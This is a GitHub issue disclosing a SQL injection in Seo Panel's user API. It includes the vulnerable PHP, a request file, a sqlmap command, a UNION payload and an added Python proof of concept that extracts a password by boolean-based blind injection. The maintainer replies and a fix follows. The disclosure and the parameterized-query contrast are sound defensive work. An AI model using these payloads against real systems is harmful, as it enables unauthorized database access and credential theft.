
SQL Injection Vulnerability in API function (user.api.php) #219

Closed
victomteng1997 opened this issue Jun 7, 2021 · 2 comments

@victomteng1997
Hi there,

I want to report a SQL Injection Vulnerability in the current API implementation of Seo-Panel.
In api/user.api.php, the function getUserName directly calls the function __checkUserName in the controllers/user.ctrl.php file without filtering the variables. An attacker can pass an arbitrary string to the username variable through $info. This allows injection into the __checkUserName function directly:

getUserName:

    function getUserName($info) {
        // $info comes straight from the API request; no sanitization is applied here
        $username = $info['username'];
        $returnInfo = array();
        // validate the user id and user info
        if (!empty($username)) {
            // $username is forwarded to the controller as-is
            if ($userInfo = $this->ctrler->__checkUserName($username)) {
                $returnInfo['response'] = 'success';
                $returnInfo['result'] = $userInfo;
                return $returnInfo;
            }
        }
        $returnInfo['response'] = 'Error';
        $returnInfo['error_msg'] = "Invalid username provided";
        return $returnInfo;
    }

__checkUserName:

    function __checkUserName($username) {
        // $username is interpolated directly into the query text: SQL injection
        $sql = "select id from users where username='$username'";
        $userInfo = $this->db->select($sql, true);
        return empty($userInfo['id']) ? false : $userInfo['id'];
    }

The above-mentioned vulnerability can be reproduced by sqlmap through a request file injection.txt:

POST /seopanel/api/api.php HTTP/1.1
Host: localhost
Accept: */*
Content-Length: 118
Content-Type: application/x-www-form-urlencoded
Connection: close

SP_API_KEY=<key_here>&API_SECRET=<secret>&category=user&action=getUserName&username=spadmin

with the sqlmap command: sqlmap -r injection.txt -p 'username'. A boolean-based blind injection shall work, with a payload similar to:
username=123' UNION ALL SELECT CONCAT(CONCAT('abc','abc'),'abc')-- (do note that there is one space at the end of the variable to bypass the original quotation mark).
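The following is an added demonstration, not Seo Panel code and not part of the report above: it rebuilds the two query styles the report contrasts (string interpolation as in __checkUserName, versus a bound parameter), runs the reporter's quote-break/UNION payload shape against both, and then drives a boolean-based blind extraction through the username check, which is what sqlmap does with the -p 'username' run described. SQLite stands in for the MySQL backend, so the payloads use SQLite syntax (substr instead of CONCAT-based probes); the users table, its password column and its rows are constructed sample data, not the project's schema.

```python
"""Added demonstration (not Seo Panel code): why pasting $username into
"select id from users where username='$username'" is exploitable, and what
the parameterized equivalent looks like.  SQLite stands in for MySQL, so the
payloads are adapted to SQLite syntax.  The users table and rows are
constructed sample data; only the id and username columns come from the
quoted query, the password column is assumed so the blind probe has
something to read."""
import sqlite3
import string

# Constructed sample rows.
SAMPLE_USERS = [("spadmin", "s3cret"), ("alice", "hunter2")]

# Same shape as the reporter's payload: break out of the quote, UNION onto the
# single id column, trailing "-- " comments out the original closing quote.
UNION_PAYLOAD = "nobody' UNION ALL SELECT id FROM users WHERE username='spadmin'-- "


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)", SAMPLE_USERS)
    return conn


def check_username_vulnerable(conn, username):
    """Same construction as __checkUserName: the value becomes part of the SQL text."""
    sql = f"select id from users where username='{username}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else False


def check_username_safe(conn, username):
    """Parameterized form: the value travels separately from the query text, so
    quotes and comment markers inside it are just characters in a string."""
    row = conn.execute("select id from users where username=?", (username,)).fetchone()
    return row[0] if row else False


def extract_blind(oracle, column, target_user, max_len=32):
    """Boolean-based blind extraction through the username check.  The caller
    only learns whether a user id came back, so each probe asks one yes/no
    question about one character of the target column (this is the technique
    the sqlmap run in the report relies on)."""
    alphabet = string.ascii_letters + string.digits
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            probe = (
                f"{target_user}' AND substr((select {column} from users "
                f"where username='{target_user}'),{pos},1)='{ch}'-- "
            )
            if oracle(probe):
                recovered += ch
                break
        else:
            break  # no character matched: end of value (or alphabet exhausted)
    return recovered


def demo():
    conn = make_db()

    def vuln_oracle(u):
        return bool(check_username_vulnerable(conn, u))

    def safe_oracle(u):
        return bool(check_username_safe(conn, u))

    return {
        "legit_lookup": check_username_vulnerable(conn, "spadmin"),
        "union_via_vulnerable": check_username_vulnerable(conn, UNION_PAYLOAD),
        "union_via_safe": check_username_safe(conn, UNION_PAYLOAD),
        "blind_via_vulnerable": extract_blind(vuln_oracle, "password", "spadmin"),
        "blind_via_safe": extract_blind(safe_oracle, "password", "spadmin"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

Against the interpolated query the UNION payload returns spadmin's id for a username that does not exist, and the blind loop recovers the whole sample password using nothing but the success/error distinction the API already exposes; against the bound-parameter query both attempts return false. The trailing space after `--` is kept because MySQL requires it for a comment (SQLite does not); in the project's PHP the safe variant corresponds to a prepared statement with a bound parameter rather than escaping the value into the string.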

@sendtogeo

Thanks a lot for finding it and updating us.

Thanks for your great support.

We will release a fix for it in this month's release, version 4.10.0 👍

@sendtogeo sendtogeo added this to the 4.10.0 milestone Jun 7, 2021
@sendtogeo sendtogeo self-assigned this Jun 7, 2021
@sendtogeo sendtogeo added the bug label Jun 7, 2021
sendtogeo pushed a commit that referenced this issue Aug 29, 2021
@sendtogeo

Fixed in the latest version, 4.10.0
